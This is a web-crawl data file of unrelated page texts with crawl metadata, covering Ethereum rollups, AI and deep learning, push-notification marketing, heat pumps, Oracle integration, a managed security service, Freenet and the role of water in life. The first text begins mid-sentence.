cost-effective routes for cross-chain swaps. For that purpose, Li.Finance splits transactions if required and it falls back to alternative liquidity networks if the best protocol isn’t available. Figure 9 shows Li.Finance architecture. As illustrated above, Li.Finance serves the following purposes: - Aggregate cross-chain liquidity (e.g. stablecoin and native currency swaps); - Connect to DEXs to enable any-to-any swaps; - Connect to money markets to enable any-to-any loans; - Make that liquidity mesh available through different layers and integrations; The Ethereum rollup-centric roadmap marks the technological transition into a sustainable scalability model that outperforms all monolithic Layer-1 solutions and inverts the blockchain trilemma without compromising neither security nor decentralization. This can be achieved by adopting a modular architecture that segregates security, data-availability, and execution into different layers. As a result, Ethereum is now focused on becoming a platform for smart contract platforms that prioritizes both security and data-availability, and delegates the execution layer to an open design space where Layer-2 solutions can compete. For this vision to come to fruition there is an extensive infrastructure stack that needs to be developed. As such, it is necessary to prioritize the development and adoption of optimistic rollups, zk-rollups, interoperability bridges, and cross-chain liquidity aggregators. For the short term, optimistic rollups (e.g. Arbitrum and Optimism) represent the leading scaling solutions for the Ethereum ecosystem due to the existing advantages in terms of general-purpose EVM computation. This characteristic provides the composability that is required by the application layer. However, for the long-term, zk-rollups will prove to be superior for all use cases once general-purpose computation is supported on mainnet. This transition to zk-rollups will naturally occur due to the higher throughput, inferior transaction costs, and lower withdrawal periods (without any trust assumptions), that characterize this type of rollup. Furthermore, zk-rollups will support composability and interoperability with off-chain data-availability solutions such as Validium and zkPorter. This approach constitutes a hybrid system that empowers users with an off-chain data-availability option that represents a tradeoff between security and costs. It is worth noting that with this solution users can still interact with the zk-rollup mode that inherits Ethereum’s security and data-availability. Additionally, this solution is still far more secure than sidechains due to the fact that funds can be frozen (with a supermajority collusion) but never stolen. To ensure that Layer-2 preserves cross-rollup composability, and a seamless flow of liquidity, it is necessary to adopt trustless interoperability bridges that prioritize security and connect siloed rollups. In this sector, Hop protocol and Connext represent the leading EVM-focused interoperability bridges that are non-custodial and therefore deemed as sufficiently secure to be adopted. Moreover, cross-chain liquidity aggregators that enable any-to-any swaps and aggregate liquidity among different bridges will also become progressively more important as abstraction tools for end users. The capital migration from Layer-1 to Layer-2 will be incentivized with liquidity mining programs. Both interoperability bridges and rollups will launch native tokens in order to promote adoption and incentivize liquidity, as such, the next stage of incentives within DeFi will catalyse the transition to an ecosystem that is free from the limitations of the Ethereum Layer-1. In summary, a modular architecture is the only sustainable approach to address scalability limitations. By separating the execution layer from the data-availability and security layers, it is possible to invert the blockchain trilemma and reduce transaction costs with an increasing adoption. Furthermore, to create a functional ecosystem at a Layer-2 level, it is necessary to develop and adopt a core infrastructure stack that will be composed of rollups, interoperability bridges, cross-chain liquidity aggregators, and a unified liquidity layer. 1. Optimism. (n.d.). Optimism Documentation. Retrieved September 22, 2021, from https://community.optimism.io/ 2. Arbitrum. (n.d.). Arbitrum Documentation. Retrieved October 27, 2021, from https://developer.offchainlabs.com/docs/inside_arbitrum 3. zkSync. (n.d.). zkSync Documentation. Retrieved October 4, 2021, from 4. StarkWare. (n.d.). StarkEx Documentation. Retrieved October 8, 2021, from 5. Connext. (n.d.). Connext Documentation. Retrieved October 14, 2021, from 6. Whinfrey, C. (2021, January). Hop: Send Tokens Across Rollups. 7. Medium. (2021, October). Introducing FundMovr: Seamless Cross-Chain Bridging. Retrieved October 25, 2021, from
systems_science
https://www.weathergagecapital.com/news-insights/deep-dreams-2
2023-01-29T14:45:55
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499744.74/warc/CC-MAIN-20230129144110-20230129174110-00819.warc.gz
0.958183
1,256
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__305990056
en
After sixty years of failed starts in AI, it appears that the tumblers are finally clicking and the breakthroughs are happening @JBElsea @WeathergageTeam In my previous blog A(l)chemical Reactions, I drew an arc between the medieval proto-scientific philosophy of alchemy and self-driving cars. The connection wasn’t as tortured as one would think and it allowed me to get across two related ideas. First, important insights may come from unexpected places and applied in unexpected ways to unexpected things. Second, it takes a while for all the technology tumblers to click into place but when they do, breakthroughs happen and many previously locked doors fly off their hinges. Such a breakthrough may have taken place with artificial intelligence (AI) and specifically, with a neural network-based approach called “deep learning”. A few months ago, we had the pleasure of hearing Frank Chen, head of Research at Andreessen Horowitz, present an excellent primer on AI. But before you read Frank’s thoughts, I’ll attempt to synthesize a few of his points and why they matter. Artificial intelligence is one of those buzzy, short-hand terms that is frequently used and just as frequently misunderstood. The misunderstanding is to be expected since AI has a lot of components and a complicated taxonomy. For instance, deep learning is a subset of machine learning which itself is a subset of AI. In its simplest form, AI is a set of algorithms and techniques that allow computers to mimic human intelligence. How the mimicry is pursued, however, is where things get tricky because there are many approaches. AI research began in the mid 1950’s, some of it in response to the Cold War. The U.S. intelligence services didn’t have enough Russian-speaking people to monitor the Soviets so they thought it would make sense to program computers to recognize and translate natural language. Turns out, natural language recognition is really hard, especially using 1950’s technology, and after spending millions of dollars and a decade’s worth of work, the effort was abandoned. There were later attempts at different AI applications—remember “expert systems” of the 1980’s? — but the result was decades of AI boom-bust cycles. While the technology was undoubtedly improving, the improvements were insufficient to crack open the AI locks. But that was then and this is now. Maybe. After sixty years – that’s right, sixty years – of failed starts in AI, it appears that the tumblers are finally clicking and the breakthroughs are happening. What’s changed? Pretty much everything. The original approach was for humans to teach the computer to mimic a human function. Researchers would create rules that described a behavior or speech, input the rules into the computer and the computer would then produce human-like output. As we’ve seen, that didn’t work out so well. Today’s researchers are taking a totally different approach. They are applying neural networks – an idea from the 1940’s – to model data structures that mimic the way the human brain processes information. I won’t pretend to have more than a superficial understanding of the mechanism, but I think it works something like this: researchers feed massive amounts of data into very powerful computers, provide some algorithms to help the computers learn from the data and then the computers use the data to basically teach themselves to mimic the targeted behavior. This last bit is the subset of AI called “deep learning” and it is considered to be the primary contributor to the recent AI breakthrough. What else enabled this breakthrough? The same advances I talked about in my previous blog Back in the day, compute was expensive, the data were sparse, and most of the research was buried inside government or corporate labs or done by small teams of underfunded academics. Not anymore. Readers are already using products powered by AI, and have been for a while. If you’ve used Facebook or Amazon, watched movies on Netflix, read BuzzFeed, rented an AirBnb, or asked Siri a question, you’ve used some form of AI. And you’ve probably noticed that the products and services keep getting better and smarter all the time. (Check out Amazon’s Echo if you haven’t already—its logo should be a Trojan horse.) The semi-autonomous features of many new cars and trucks are powered by forms of AI, and more sophisticated applications will power the fully autonomous versions that will be on the road in the very near future. And AI is not just for consumer applications. Its constituents are already reading X-rays and diagnosing blood cancers at much higher rates of accuracy than human experts. We believe that AI, and deep learning in particular, is another fundamental technological shift, and big changes are in store. Entrepreneurs and techy top guns are fully engaged, as are many venture capitalists. We expect that many of the AI winners will be venture-backed start-ups and that the biggest will be those who are doing something most people either haven’t thought of or thought impossible. We can’t wait! P.S. About those images at the beginning of the blog. The first image is a beautiful photo of a night sky just outside Kruger Park in South Africa, taken by my partner, Tim Bliamptis. The second is the same image transformed by an AI algorithm called Deep Dream Generator. As the Deep Dream website explains, the algorithm initially was invented to help scientists and engineers to see what a deep neural network is seeing when it is looking in a given image. Since then the algorithm has become a new form of psychedelic and abstract art. If you want to know even more about AI, check out Pedro Domingo’s podcast. You can find it on the Farnham Street blog. https://www.farnamstreetblog.com/2016/09/pedro-domingos-artificial-intelligence/. Here’s shorter piece from IEEE Spectrum.
systems_science
https://www.ngrow.ai/blog/navigating-geolocation-based-push-notifications-with-ai
2023-10-04T00:13:13
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233511284.37/warc/CC-MAIN-20231003224357-20231004014357-00377.warc.gz
0.867465
667
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__75019077
en
In the era of mobile technology and artificial intelligence (AI), the convergence of geolocation-based push notifications offers an unprecedented opportunity for personalized marketing. By harnessing AI-powered insights and user location data, businesses can deliver hyper-targeted messages that resonate with users in real-time physical contexts. Let’s delve into the synergy of geolocation-based push notifications and AI, exploring strategies and best practices to drive engagement, enhance user experiences, and optimize mobile marketing campaigns. The Power of Geolocation-Based Push Notifications Enhanced by AI Geolocation-based push notifications, when augmented by AI, transcend traditional marketing tactics. How? AI algorithms analyze user behavior, preferences, and historical data to tailor notifications based on not only location but also individual inclinations. This dynamic approach creates a seamless connection between the digital and physical worlds, enabling businesses to engage users with unprecedented precision. Strategies for Effective Geolocation-Based Push Notifications with AI - AI-Powered Segmentation: Utilize AI-driven data analysis to segment your user base according to location, behaviors, and preferences. This fine-grained segmentation enables personalized notifications that cater to specific interests and contexts. - Predictive Triggers: Employ AI algorithms to predict user movements and behaviors. By anticipating user actions, you can trigger notifications just as users enter a geofenced area, enhancing relevancy and engagement. - Behavioral Contextualization: Combine AI insights with geolocation data to understand user context better. Send notifications that align with users' current activities or intents, providing value and relevance. - Smart Content Recommendations: Leverage AI to recommend content, products, or services based on both user preferences and physical location. This approach maximizes the chances of user interaction. - Dynamic Personalization: Implement AI-powered dynamic content that adapts based on real-time data. For instance, a retail app could dynamically update a notification to showcase the nearest store's available products. Best Practices for Geolocation-Based Push Notifications Enhanced by AI - AI-Backed Personalization: Ensure AI-driven personalization enhances the user experience rather than intruding on privacy. Strive for a delicate balance between personalization and user comfort. - Real-Time Adaptation: Leverage AI to adjust notifications in real time based on user responses or changing circumstances, maintaining relevance and avoiding annoyance. - A/B Testing with AI Variants: Use AI-driven A/B testing to refine your geolocation-based notifications. Test different AI-generated content, timing, and triggers to optimize engagement rates. The fusion of geolocation-based push notifications and AI introduces a new frontier in mobile marketing. By integrating AI's cognitive capabilities with user location insights, businesses can create dynamic, contextually relevant interactions that resonate deeply with users. As you navigate this synergy, remember to uphold user privacy, prioritize personalized value, and continuously fine-tune your strategies through AI-driven optimization.
systems_science
https://reseller.com.ph/product/production-report/
2023-12-04T12:13:23
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100529.8/warc/CC-MAIN-20231204115419-20231204145419-00093.warc.gz
0.941569
258
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__217808538
en
Manufacturing companies performs mass production daily. The production flow is continuous. Hence a report is highly important to keep track of all the activity happening on the production floor. It is hard to gather all the data as each line needs to manually fill up the Production Report and submit it to the Production Staff. The Production Staff will encode the reports and compile it before submitting to the management. SITO software can solve this issue. Line leaders or the Office-in-charge can fill up the form in the mobile app instead. They can also upload pictures of assembled parts in their line and also sign in the signature tab for confirmation. In addition to this, there is also a built-in barcode scanner. SITO also records the GPS location of the data submission so the management can make sure that every report is done within the production floor. The report that will be submitted thru the mobile app is then stored in our web server which the production staff can view or edit on our Admin Site. The Production staff can easily export the file in xls format. No need to encode the reports one by one. This software can save a lot of time and error and will lift some burden off from Line Leads’ and Production Staff’s workload.
systems_science
https://precisionagingnetwork.org/about-us/
2024-02-22T18:33:10
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947473824.13/warc/CC-MAIN-20240222161802-20240222191802-00152.warc.gz
0.871909
171
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__206857973
en
The Precision Aging® Network (PAN) brings together a team of established scientists and community partners in a nationwide effort to help discover the best ways to optimize brain health across the lifespan and extend our cognitive healthspan. PAN’s method is novel, creating a framework for a precision medicine approach to predict individual brain health risks and discover personalized solutions to maximize our own individual PAN seeks your help to answer critical questions. - What impacts healthy brain function as we age? - How can optimal brain function be maintained across our entire lives? - For you as an individual, how can we predict, prevent, or slow unwanted changes in cognition? In September 2021, the National Institutes of Health, National Institute on Aging, awarded $60 million to the University of Arizona and the PAN team to launch the Precision Aging® Network.
systems_science
https://wpi.fandom.com/wiki/Telnet
2019-03-23T05:07:28
s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912202723.74/warc/CC-MAIN-20190323040640-20190323062640-00274.warc.gz
0.948654
114
CC-MAIN-2019-13
webtext-fineweb__CC-MAIN-2019-13__0__5247804
en
Telnet was the standard protocol used for connecting to WPIs server prior to the requirement of using an SSH connection. Telnet was used on campus as a noun and a verb. Students and faculty (and some staff) would frequently telnet to ccc.wpi.edu to check their e-mail, use TurnIn, or access personal files. As of August 1, 2003, telnet access was no longer allowed due to it sending password information over an "insecure medium". This security concern also removed FTP access in favor of SFTP.
systems_science
https://gen-p-soft.com/seamless-software-integration-javas-role-in-oracle-systems/
2024-04-17T22:08:37
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817181.55/warc/CC-MAIN-20240417204934-20240417234934-00240.warc.gz
0.85833
825
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__142545783
en
Introduction: In the realm of enterprise-level software integration, the combination of Java and Oracle Systems stands as a robust and versatile solution. Java, known for its platform independence and extensive libraries, plays a pivotal role in connecting and orchestrating various software components within Oracle’s ecosystem. This article explores the fundamentals, best practices, and advantages of integrating software with Java on Oracle Systems. Understanding Software Integration with Java on Oracle Systems: Software integration involves combining different software components or systems to work cohesively. Oracle Systems, with its comprehensive suite of applications and databases, often requires seamless integration to enhance business processes. Java’s adaptability and compatibility make it a natural choice for achieving this integration, allowing for the creation of scalable and efficient solutions. Key Concepts for Integration: - Java Database Connectivity (JDBC): - JDBC, a Java-based API, is instrumental in integrating Java applications with Oracle databases. It provides a standardized way for Java programs to connect, query, and update data in Oracle databases. - Oracle WebLogic Server: - Java applications can be deployed on Oracle WebLogic Server, Oracle’s enterprise-level application server. This provides a robust platform for hosting, managing, and scaling Java-based applications in an Oracle environment. - Oracle Integration Cloud (OIC): - OIC is Oracle’s cloud-based integration platform that facilitates the seamless connection of different applications, including those developed in Java. It provides pre-built adapters and connectors to streamline integration processes. - Java EE Technologies: - Java Platform, Enterprise Edition (Java EE) technologies, such as Enterprise JavaBeans (EJB) and Java Message Service (JMS), are integral for building scalable and distributed applications that integrate seamlessly with Oracle Systems. Best Practices for Successful Integration: - Use of Oracle Cloud Services: - Leverage Oracle Cloud Services for hosting Java applications. This provides a scalable and cost-effective infrastructure for running applications that require integration with Oracle databases and services. - Security Measures: - Implement robust security measures, including encryption and secure communication channels, to safeguard data during integration processes. Oracle’s security features and Java’s security libraries can be combined for comprehensive protection. - Transaction Management: - Implement effective transaction management to ensure data consistency across integrated systems. Java Transaction API (JTA) can be employed to manage distributed transactions within Oracle Systems. - Error Handling and Logging: - Develop a comprehensive error handling and logging mechanism to facilitate troubleshooting during integration processes. Oracle’s logging tools and Java’s logging framework can be synergized for effective monitoring. Advantages of Java Integration on Oracle Systems: - Platform Independence: - Java’s „write once, run anywhere“ philosophy ensures that applications developed in Java can seamlessly run on various operating systems, making it compatible with Oracle’s diverse ecosystem. - Rich Ecosystem: - Oracle offers a rich ecosystem of products and services that complement Java integration, including databases, middleware, and cloud solutions. This synergy allows developers to build end-to-end solutions. - Java’s scalability and Oracle’s ability to handle large datasets make the combination ideal for building scalable and high-performance applications that can grow with evolving business needs. - Community Support: - Both Java and Oracle technologies have large and active developer communities. This support network provides access to resources, documentation, and best practices, facilitating the integration process. Conclusion: Integrating software with Java on Oracle Systems is a strategic approach to building robust, scalable, and efficient solutions for enterprise-level applications. The combination of Java’s versatility and Oracle’s comprehensive suite of products offers developers the tools they need to create seamless integrations that enhance business processes and drive digital transformation within organizations. By adhering to best practices and leveraging the strengths of both Java and Oracle Systems, developers can unlock the full potential of their integrated solutions.
systems_science
https://www.refrigerationnova.ca/residential.php
2019-08-18T13:50:51
s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027313889.29/warc/CC-MAIN-20190818124516-20190818150516-00059.warc.gz
0.926783
692
CC-MAIN-2019-35
webtext-fineweb__CC-MAIN-2019-35__0__6601474
en
Dual-energy systems with heat pump Dual-energy systems whose electrical part is composed of a heat pump present certain specificities. A heat pump at optimum capacity can usually provide warmth and comfort with no assistance up to an outdoor temperature of just a few degrees above freezing. This outdoor temperature is called “equilibrium temperature” of the heat pump. A dual-energy system with a heat pump of the air/air type normally operates as follows : - When the outdoor temperature is higher than the equilibrium temperature, the heat pump itself undertakes the demand for heating. - When the outdoor temperature goes down to the level of the equilibrium temperature or lower, the heat pump must be supported by another source of energy. - When the outdoor temperature drops under the normal permutation temperature of the system (-12° C or -15° C), the heating pump’s functioning is blocked and the complementary energy source undertakes all the need for heating on its own. The advantages of the heating and air-conditioning systems based on geothermal energy - 67% up to 70% of energy saving compared to a conventional heating system, 35% savings on hot water and 50% on air-conditioning. - It offers a better quality of the air through a gentler heat. - Constant temperature all year round. - Since the complete unit is installed indoors, your system’s operating life will be prolonged (25 years and more) - Requires very little maintenance. - Clean and renewable source of energy. - The geothermal system does not emit CO2, which is the major element of pollution. - No fire or smoke. - No risk of vandalism, the system is installed indoors. - Increases the resale value of your house. - Savings are bigger than your investment since the very first year. - Significant reduction of your energy bill, costs are related to the maintenance of your heating system and insurance. - It can be favourably combined with radiant heating. Source: natural resources, Canada and Hydro-Québec How does it work: You have on your property a source of inexhaustible energy that could be exploited for free. Since the soil temperature remains constant during the entire year at around 9°C, the geothermal heat pump allows you to efficiently heat and cool your property in a safe way and throughout the whole year. Vertical loops are manufactured using HDPE pipes that are hidden in holes dug in the soil. The holes range in size from 15 to 100 m in depth and their circumference is between 10 and 12 cm. Two pipe lengths, “U profile”. Once the pipes are placed in the drill holes, they are filled with clay. As their name suggests, these loops are buried horizontally, usually at a depth of 2 to 2,5m – although it could vary from 1,5 to 3 m or more. Ditches are excavated using a backhoe; a chain trencher might also be used depending on the soil composition. These two loops can be installed in a very cost-effective way in a property, close to a lake or a pond that absorbs the energy of the sun during summer. All you need is just a water surface of 2 to 2,5 m of depth all year round, which allows to protect the loop from waves and ice pile-ups.
systems_science
https://fr.spinnakersupport.com/enterprise-software-support-services/security-and-vulnerability-support/
2020-01-27T13:52:30
s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251700675.78/warc/CC-MAIN-20200127112805-20200127142805-00089.warc.gz
0.914067
761
CC-MAIN-2020-05
webtext-fineweb__CC-MAIN-2020-05__0__215070742
en
Vulnerability Assessment – As application developers increasingly use open source and commercial frameworks and libraries to accelerate their production, they also introduce a long tail of inherited vulnerabilities that increase your attack surface. Spinnaker Support, powered by Alert Logic, provides the ability to run internal and external vulnerability scans and reports for on-premises, hosted, and cloud environments with continuous updates to more than 92,000 Common Vulnerabilities and Exposures (CVEs) in software and certain network components. We support several different use cases including automated agent-based scanning and agentless continuous scanning approaches for software and device vulnerabilities, monitoring your AWS environments for misconfigurations, and providing external scanning as a PCI Approved Scanning Vendor. Managed Web Application Firewall (WAF) – We provide a managed web application firewall service to block known bad activity. We will start you with out-of-the-box signatures and both positive and negative rules to observe your applications’ behavior through the WAF’s deny logs. We add and tune rules, potentially down to the level of specific pages and even forms, to eliminate false positives. Blocking rules are turned on selectively as you and our WAF specialist are comfortable that enough traffic has passed through to validate that the rule correctly fires without undue false positives. Your Spinnaker Support team will continue to update and tune your WAF as your applications and threat environment evolve. Data Inspection – We collect and inspect 3 kinds of data for suspicious activity. Each data type has strengths in identifying certain kinds of threats and then together to see the whole picture and improve accuracy and actionable context. (1) Web: We inspect both HTTP requests and HTTP responses. (2) Log: We collect and normalize log data so analytics can identify certain threat activity like brute force and lateral movement, so analysts can investigate logs, and so you can search and report on it whenever you want for forensics and audits since we retain it for at least one year. (3) Network: Our IDS agents inspect all network packets and select those that look suspicious for further analysis in our analytics engine. Detection Analytics – Analytics weed out false positives and more accurately detects actual attacks with 3 different kinds of analytics: (1) Signatures and rules that detect known malicious patterns; (2) Anomaly detection that compares current activity against baselines to flag unusual activity; (3) Machine learning which includes more than 200,000 vectors (vs. typical 5-10 in a signature) across data from thousands of customers to identify custom, multi-stage attacks. All 3 types of analysis benefit from a treasure trove of rich, consistent data we collect from 4000 customers, which gives us a force multiplier for our analytics to find patterns other vendors could never see. 24 x 7 Monitoring & Validation – As part of our security and vulnerability protection solution, analysts in one of our 24 x 7 x 365 security operations centers investigate and triage incidents as they are created through the analytics. Spinnaker Support ERP Security Experts and Alert Logic Certified Security Experts Includes: - Experts with extensive backgrounds and experience in international, cyber, military, and civilian security - Compliance expertise in PCI DSS, HIPAA, NERC, CJIS, NIST, SOX COBIT, GLBA, and GDPR Spinnaker Support, powered by Alert Logic, offers full technology stack security and vulnerability protection with human expertise included (security analysts combined with Oracle and SAP application engineers.) Our customers deal with one single vendor, for service, pricing, commercial terms, and communication coordination. Plus, there is no upcharge for our standard security and vulnerability support. For more information on Spinnaker Support’s Advanced Security solution, contact us today.
systems_science
https://bleenman.wordpress.com/2012/10/17/business-agility-layer-the-answer-to-it-obesity/
2020-04-04T05:45:29
s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370520039.50/warc/CC-MAIN-20200404042338-20200404072338-00162.warc.gz
0.954958
1,644
CC-MAIN-2020-16
webtext-fineweb__CC-MAIN-2020-16__0__224780917
en
I have devoted a lot of my posts to discussing the notion of what it is to be a ‘Social Enterprise’ or, now that that term is no longer being used, the ‘Socially connected enterprise’. But how do you get there? And how do you stay there when everything around you – and within your company – is evolving so rapidly. Well, crucial to getting there and staying there is the ‘Business Agility Layer’ – a valuable notion that I believe is the cure to the problem of IT obesity. This post will explore what this ‘layer’ looks like and what form it takes in a day-to-day technology context. What is IT obesity? Many organizations suffer from IT obesity. It’s remarkable how the problem of IT obesity has emerged in parallel with the prevalence of obesity among humans (maybe IT tells us more about our characters than we’d care to admit?) The last few decades have seen a huge increase in the complexity of IT systems. Today, many generations of infrastructure and software operate alongside each other, intertwined like a plate of spaghetti. As the role and value of IT has increased, we have added new functionalities and we have added new technologies. The operative word in all of this is ‘added’. Very little ‘subtracting’ or ‘consolidating’ has taken place during this time. So now consider how many new technologies have been developed in the last couple of decades, how many times business needs have changed. Living proof of how things have changed exists in almost every enterprises’ IT landscape, with data centers resembling ‘journeys through time’. Today, IT decision makers are weighed down by this history – unable to maneuver or innovate due to the sheer complexity and weight of the IT landscape. Think of this using the obesity analogy… IT has become so fat that the business can no longer run or change direction as and when it needs to. Throw into this unhealthy mix an economic crisis and all of the additional pressures that departments face during a downturn (reduce cost at all cost), and it doesn’t make for a pretty picture. In many cases, IT became the inhibiter of change. As a result of this IT obesity, the disconnect between business and IT has become more profound, with business coming to see IT as an impediment to positive change within the business. While the business calls out for solutions to its rapidly evolving challenges, IT is often found to be slow to react, engrossed instead in deploying the latest release or version of a traditional software solution. In this way, the business-IT divide has evolved from being organizational, to being political as well. Where no alignment with the business exists, the IT department goes about its own business, and in the process, continues to suffer from IT obesity. Sounds awfully grim doesn’t it? Don’t despair – there is hope! Cloud technology is the answer. There is a light shining at the end of this seemingly very dark tunnel. Cloud computing technology has opened a world of new possibilities and has breathed new life into the business-technology relationship. Thanks in no small part to this paradigm-changing technology, the notion of business-enabling IT is, once again, a reality. Anytime anywhere connectivity, cloud economies of scale and a host of other new technologies, have come together and created the conditions for the emergence of the business agility layer. And while this doesn’t remedy all the IT ills of the past in one single act, this layer can be spread across the existing legacy IT landscape, adding a degree of flexibility and interconnection that would otherwise be impossible. This business agility layer serves as a link between old and new, and enables pent-up demand from the business to be satisfied without the daunting obstacle of having to delve too deep into the deep-and-complex legacy IT landscape. Now the potential exists to effectively combine old and new – core IT systems for the stable processes, and rapidly deployable cloud-based apps to support business users wherever they are and on whatever device they are using at the time. Business are already embracing digital transformation as an outside-in innovation. Prompted by the rise in social media technology and quick-and-easy-to-deploy apps, marketing and sales departments have already begun to bypass the traditional route through IT and have instead started taking matters into their own hands. With the need to ‘listen’ to what is happening in the social media domain, integrating these technologies has taken on paramount importance. This can be seen as an ‘outside-in’ approach and, in many cases, is serving to deepen and widen the divide between business and IT. This is also resulting in the growing perception that IT is failing the business by not being able to integrate these highly relevant tools fast enough. Most IT departments I meet are still unable to achieve the shift in mentality that is required by technologies such as cloud and social media. End-to-end process innovation. Apply ‘the art of the possible’. IT can, though, be part of the solution to this problem. This does, though require a dramatic change in mentality. IT occupies a unique position within the business because it is capable of adding value at literally all levels of the business… provided, that is, that it adopts the right mentality. By overcoming the fear of these new technologies, IT can re-invent itself and go from being and inhibitor of change to an enabler of transformation. IT can create a new vision on architecture, namely a hybrid application landscape that combines cloud platforms with on-premise applications. The options are certainly out there in the form of SaaS solutions: Salesforce.com, Oracle (Fusion) On Demand, SAP On Demand and Microsoft Cloud, and even Google Enterprise Apps. I make no secret of the fact that I see Salesforce.com as the game changer in all of this – where they lead, others tend to follow. This is certainly the case with sales and marketing and, as outlined in an earlier post of mine (The Ripple Effect of Social HR) the same is now happening in HR. Business Agility Layer through PaaS. But the Agility Layer is starting to spread below just ‘apps’ level and deeper into the IT landscape. Cloud based Platform as a Service (PaaS) can also be seen to e playing the role of the business agility layer. Force.com, Microsoft Azure, as well as powerful tools like Cordys, Mendix, OrangeScape (to name just a few), are acting as enabling technologies and providing the means by which IT landscapes can get themselves back into shape again. So it’s possible. But what does it take to get there? There’s no excuse for enterprise IT to be out of shape. Given the technology options available today, there is no reason for IT to continue to be seen as the inhibitor of change within the enterprise. Re-invention is a bold step, but it’s one that’s worth taking. It does, though, take an ‘Enlightened CIO’ to embark upon, and successfully complete this journey. Board-room level support is also key to make the transition. I know that most organizations I speak to won’t be able to achieve this transformation easily. I fear that the issue of IT obesity is not yet seen as a life-threatening disease (similar to real life?). Most CIO’s are – and I apologise for this harsh expression – not enlightened but frightened, focusing instead on survival, on ‘keeping the lights on’, instead of taking the bold but worthwhile step of driving change and embracing the art of the possible. While fear of change is understandable, we should be asking ourselves this important question. How much longer can you afford to wait before you get left behind… for good?
systems_science
http://www.openp2p.com/pub/d/307
2018-01-24T11:53:27
s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084894125.99/warc/CC-MAIN-20180124105939-20180124125939-00541.warc.gz
0.877358
239
CC-MAIN-2018-05
webtext-fineweb__CC-MAIN-2018-05__0__242206591
en
P2P Directory > Infrastructure, Reputation and Asset Management > Freenet: The Free Network Project Freenet is a large-scale peer-to-peer network that depends on the power of member computers around the world to create a massive virtual information store open to anyone to freely publish or view information of all kinds. Freenet lacks any centralized control or administration and allows information to be published without identifying its source or its physical location. The Freenet Network consists of many computers on the Internet each running a piece of software called the "Freenet Server" or "Freenet Daemon" that enables a computer to become a "node" (a small but equal part of the larger Freenet network). The system provides a flexible and powerful infrastructure capable of supporting a wide range of applications. It enables the anonymous and uncensorable publication of material ranging from grassroots alternative journalism, provides a method for the distribution of high-bandwidth content, and provides a platform for universal personal publishing. A Quickstart and User's Manual will help get you started if you're interested in participating. Date Listed: 06/07/2001
systems_science
http://www.mostimportantthings.org/2018/03/22/water-and-life/
2020-05-30T01:59:54
s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347407001.36/warc/CC-MAIN-20200530005804-20200530035804-00231.warc.gz
0.946083
631
CC-MAIN-2020-24
webtext-fineweb__CC-MAIN-2020-24__0__59907568
en
Water makes life on Earth possible. It unites the living world like nothing else. From the lunar tides, ocean currents and seasons to the molecules that build us all, it permits and regulates all life. Embedded within this big picture, subject to the rules of ecology but often careless of them, are people. Almost all the world’s water is salty but we live on land, where a regular supply of fresh, clean water is utterly precious. It is the single most important of the ‘on/off’ switches that are hidden under the floorboards of our lives. But we have allowed these sources of fresh, clean water to be abused, diverted, polluted, or dried up. Repair is possible, but only by focusing on the ways of nature and the needs of the weak. And now climate change is demolishing the very fabric of our home, making everything worse. Water has a special structure in which its molecules, each made up of two atoms of hydrogen and one of oxygen, have a different charge on each side, so the molecules attract one another. This attraction is called a hydrogen bond, and it is strong enough to join water molecules into a swarm that behaves like a supermolecule, but weak enough that the bonds continually form and break depending on how much energy there is in the system. When there is very little energy, the molecules freeze together into ice; when there is much more, they break apart into steam. But at middle energies, they ‘shimmer’ in a way that makes life work at the level of cellular structures and chemical metabolism. Because water molecules are polar – each with a positive and a negative side – they can get a grip on all sorts of other molecules, so water dissolves and mixes with more things than any other liquid. Then, the hydrogen bonds also do weird things to how water behaves under different conditions, which make life possible at the level of organisms, ecosystems, and the whole biosphere. They allow water to absorb or lose a lot of energy before it changes from liquid to ice or steam, so blood and ocean currents carry a lot of heat. Put these things together, multiply them by a couple of billion cubic kilometres of water, each weighing a trillion tonnes, and stir using the energy of a vast thermonuclear reactor (the Sun), and you have the main unifying theme of our living world. But because of the hydrogen bonds, ice needs 80 times more energy to melt than liquid water does to warm up. This alone puts water among the most important things right now, since the ice in the Arctic Ocean has been absorbing the extra heat of global warming for decades, and every summer there is less ice up there. When it finishes melting, only a few years from now, a sudden heating of the Arctic is inevitable, along with a surge of methane and other greenhouse gases. This is what people mean when they talk about ‘tipping points’ and ‘runaway climate change’, and it could spell the end of the only living world that we have ever known. © Julian Caldecott
systems_science
http://www.coalfire.caf.dlr.de/results/result_vm_dynamic_pressure_en.html
2013-05-22T02:28:00
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368701153213/warc/CC-MAIN-20130516104553-00028-ip-10-60-113-184.ec2.internal.warc.gz
0.908347
364
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__167049575
en
